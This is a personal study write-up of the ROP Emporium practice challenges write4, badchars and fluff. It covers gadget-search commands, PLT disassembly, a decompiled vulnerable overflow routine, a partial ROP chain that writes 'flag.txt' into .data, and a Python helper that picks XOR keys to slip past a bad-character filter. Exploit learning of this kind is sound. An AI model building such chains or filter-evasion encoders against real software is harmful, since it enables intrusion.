Basic ROP: ROP Emporium challenges 3 to 4

ROP Emporium: write4, badchars, fluff
write4 and badchars are both solved; for fluff I couldn't find a usable gadget.
Code: https://github.com/Finsenty54/attack-code/tree/master/ROPemporium

Commands

Found by searching around:
https://github.com/abatchy17/ROP-Emporium

  1. Get function names: nm binary | grep ' t '
  2. Get GOT entries: readelf --relocs binary
  3. Get PLT entries: objdump -M intel -dj .plt binary
  4. Get strings: strings binary or the much better alternative rabin2 -z binary
  5. Virtual address space layout: vmmap in PEDA after starting program, otherwise other modules aren't mapped yet.

write4

32-bit

PC: the address of the current instruction

objdump -s
objdump -R 
objdump --section=.plt -d ./write432 // view the PLT

./write432: file format elf32-i386

Disassembly of section .plt:

080483a0 <.plt>:
 80483a0:    ff 35 04 a0 04 08        pushl  0x804a004
 80483a6:    ff 25 08 a0 04 08        jmp    *0x804a008
 80483ac:    00 00                    add    %al,(%eax)
    ...

080483b0 <pwnme@plt>:
 80483b0:    ff 25 0c a0 04 08        jmp    *0x804a00c
 80483b6:    68 00 00 00 00           push   $0x0
 80483bb:    e9 e0 ff ff ff           jmp    80483a0 <.plt>

080483c0 <__libc_start_main@plt>:
 80483c0:    ff 25 10 a0 04 08        jmp    *0x804a010
 80483c6:    68 08 00 00 00           push   $0x8
 80483cb:    e9 d0 ff ff ff           jmp    80483a0 <.plt>

080483d0 <print_file@plt>:
 80483d0:    ff 25 14 a0 04 08        jmp    *0x804a014
 80483d6:    68 10 00 00 00           push   $0x10
 80483db:    e9 c0 ff ff ff           jmp    80483a0 <.plt>

objdump -j .plt -d ./write432 has the same effect.

ROPgadget --binary ./write432 --only 'mov|ret'
ROPgadget --binary ./write432 --only 'mov|ret' | grep ebx

Key point: print_file takes an address as its argument, so a string cannot be passed directly; the filename has to be written into writable memory first and its address passed.

0x00001018    0x8 0x0804a018    0x8 -rw- .data

I chose to put the string in the .data section.

dataaddress = p32(0x0804a018)  # .data address taken from the section listing above
data1 = b'flag'                # the string is written in two 4-byte stores
data2 = b'.txt'

The first time I didn't split the data. ebp is only 32 bits, so only 4 bytes can be passed at a time; I somehow failed to realize that on my first attempt.

64-bit

│           0x0040061b      bfb4064000     mov edi, str.nonexistent    ; 0x4006b4 ; "nonexistent"
│           0x00400620      e8ebfeffff     call sym.imp.print_file

The argument is passed in RDI
#0x0000000000400628 : mov qword ptr [r14], r15 ; ret
#0x0000000000400690 : pop r14 ; pop r15 ; ret
#0x0000000000400693 : pop rdi ; ret

gadget  = popret + dataaddress + data + movret  # pop r14; pop r15; ret -> r14 = .data address, r15 = "flag.txt"; then mov [r14], r15
gadget += popret1 + dataaddress                 # pop rdi; ret -> rdi = .data address
gadget += printfile                             # return into print_file@plt

badchars

32-bit

Badchars are the reason that encoders such as shikata-ga-nai exist.
Here, each bad character is replaced with 0xeb.

IDA is the GOAT, as always.
Decompilation

int pwnme()
{
    unsigned int v1; // [esp+0h] [ebp-38h]   number of bytes read
    unsigned int i; // [esp+4h] [ebp-34h]
    unsigned int j; // [esp+8h] [ebp-30h]
    char v4[36]; // [esp+10h] [ebp-28h]   the buffer that gets overflowed

    setvbuf(stdout, 0, 2, 0);
    puts("badchars by ROP Emporium");
    puts("x86\n");
    memset(v4, 0, 0x20u);
    puts("badchars are: 'x', 'g', 'a', '.'");
    printf("> ");
    v1 = read(0, v4, 0x200u);               // up to 0x200 bytes into a 36-byte buffer
    for ( i = 0; i < v1; ++i )              // every input byte, the ROP chain included
    {
        for ( j = 0; j <= 3; ++j )          // the four bad characters
        {
            if ( v4[i] == badcharacters[j] )
                v4[i] = -21;                // -21 == 0xeb
        }
    }
    return puts("Thank you!");
}

Commands

man 7 ascii
shows the ASCII table

ropper --file ./badchars32 -b 6167782e
This is how ropper excludes bad characters; ROPgadget works the same way.

gdb-peda: find the overflow offset

gdb-peda$ pattern_create 100
gdb-peda$ pattern_offset AFAA
AFAA found at offset: 44

pwndbg> rop --grep xor -- --badbytes 6167782e --ropchain --nojop

Register notes

bl is the name of the low 8 bits (bits 7-0) in the ebx register. There is also bh which is the bits 15-8 of ebx, and bx is the low 16 bits (bits 15-0). There is no name for the higher 16 bits.

This applies to all of the registers eax, ebx, ecx and edx.
I had it wrong: bl is not part of ebp, it's part of ebx.
https://blog.csdn.net/ww506772362/article/details/75530723

Question:
The first time I passed the xor argument for ebx as 00 00 00 8a, and it sat on the stack as 00 00 00 8a; does pop ebx read it in reverse order?
So it should be 8a 00 00 00.

EBP: 0x41304141 ('AA0A')

64-bit

r14b

r14 r14d r14w r14b
There's a pitfall:
the byte at the position of 'x' happens to come out as 0x2e, which gets replaced.

Failed to open file: flag.t\xebt

Haven't found a usable gadget yet.
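Added example (my own code, not from the post or its repository) covering the two badchars problems noted above: the byte order `pop ebx` sees, and an encoded byte that collides with a bad character. It reproduces pwnme()'s filter from the decompilation, picks a one-byte XOR key for "flag.txt" such that neither the key nor any encoded byte is a bad character, and packs values little-endian; the single whole-string key and the 4-byte split are my assumptions about how the store gadgets are used.

```python
import struct

# Bad bytes the badchars binary filters, as its banner says: 'x', 'g', 'a', '.'
BADCHARS = b"xga."
REPLACEMENT = 0xEB  # pwnme() stores -21, i.e. 0xeb, over every bad byte


def filter_input(buf: bytes) -> bytes:
    """Reproduce pwnme()'s loops: every byte found in BADCHARS becomes 0xeb.
    This is what turned an unencoded 'flag.txt' into 'fl\\xeb\\xeb\\xebt\\xebt'."""
    return bytes(REPLACEMENT if b in BADCHARS else b for b in buf)


def xor_encode(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key; applying it twice restores the data."""
    return bytes(b ^ key for b in data)


def find_xor_key(data: bytes) -> int:
    """Pick a one-byte key such that the key itself and every encoded byte pass the
    filter. Checking the *encoded* bytes is what catches the 64-bit pitfall: a key
    that maps 'x' to 0x2e ('.') would be silently rewritten to 0xeb in memory.
    (Assumption: one key for the whole string, as with a single xor gadget.)"""
    for key in range(1, 256):
        if key in BADCHARS:
            continue
        if not any(b in BADCHARS for b in xor_encode(data, key)):
            return key
    raise ValueError("no single-byte XOR key avoids the bad characters")


def p32(value: int) -> bytes:
    """Little-endian 32-bit pack, like pwntools' p32(): 0x8a is laid out in memory
    as 8a 00 00 00, and that is the order `pop ebx` consumes from the stack."""
    return struct.pack("<I", value)


def split_words(data: bytes, width: int) -> list:
    """Cut the string into register-sized pieces, one `mov [reg], reg` store each
    (4 bytes on x86, 8 on x86-64)."""
    return [data[i:i + width] for i in range(0, len(data), width)]


if __name__ == "__main__":
    key = find_xor_key(b"flag.txt")
    enc = xor_encode(b"flag.txt", key)
    print(f"key=0x{key:02x} encoded={enc!r} survives_filter={filter_input(enc) == enc}")
    print(split_words(enc, 4), p32(key).hex(" "))
```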

fluff

Likewise, no useful gadget:
mov [e?x],
xchg [ecx],dl
pext edx, ebx, eax

pext explained:
https://blog.csdn.net/qq_43401808/article/details/86540472

This instruction could be used, but there's no pop eax.